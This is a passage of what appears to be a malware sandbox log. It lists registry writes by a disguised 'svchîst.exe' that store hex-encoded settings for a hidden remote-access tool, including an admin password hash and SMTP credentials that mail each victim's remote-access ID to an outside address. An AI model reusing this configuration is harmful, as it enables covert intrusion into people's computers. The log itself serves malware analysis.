16b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73